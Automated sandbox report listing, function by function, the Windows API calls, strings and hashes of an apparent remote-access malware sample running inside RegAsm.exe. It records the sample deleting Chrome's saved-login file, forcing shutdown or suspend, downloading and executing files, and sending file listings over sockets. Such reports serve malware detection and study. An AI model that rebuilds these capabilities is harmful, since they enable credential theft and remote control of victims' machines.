                                                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                  • API String ID: 1589313981-2876530381
                                                                                  • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                  • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                                                  Strings
                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                  • UserProfile, xrefs: 0040BA59
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                  • API String ID: 2018770650-1062637481
                                                                                  • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                  • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 3534403312-3733053543
                                                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00A7EAA8,00000010), ref: 004048E0
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                  • String ID:
                                                                                  • API String ID: 1824512719-0
                                                                                  • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                  • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                  • String ID:
                                                                                  • API String ID: 276877138-0
                                                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID: SETTINGS
                                                                                  • API String ID: 3473537107-594951305
                                                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                  • String ID:
                                                                                  • API String ID: 1157919129-0
                                                                                  • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                  • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                  • String ID:
                                                                                  • API String ID: 1771804793-0
                                                                                  • Opcode ID: 68a6783122a4a10a91a3de96a0a84cbe91565fef509d02217a88a77cca63afc6
                                                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                  • Opcode Fuzzy Hash: 68a6783122a4a10a91a3de96a0a84cbe91565fef509d02217a88a77cca63afc6
                                                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteFileShell
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                  • API String ID: 2825088817-3056885514
                                                                                  • Opcode ID: 5e6b9c07b2baee296e5cf14fa2da467bcf40387088e61072408596768f2b427d
                                                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                  • Opcode Fuzzy Hash: 5e6b9c07b2baee296e5cf14fa2da467bcf40387088e61072408596768f2b427d
                                                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFind$FirstNextsend
                                                                                  • String ID: XPG$XPG
                                                                                  • API String ID: 4113138495-1962359302
                                                                                  • Opcode ID: 67a09f74c196e6baf5c59d19437c2850036cbe5e71b6a3f74460d537fd135ca4
                                                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                  • Opcode Fuzzy Hash: 67a09f74c196e6baf5c59d19437c2850036cbe5e71b6a3f74460d537fd135ca4
                                                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                  • API String ID: 4127273184-3576401099
                                                                                  • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                  • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 4212172061-0
                                                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID: p'E$JD
                                                                                  • API String ID: 1084509184-908320845
                                                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 2829624132-0
                                                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
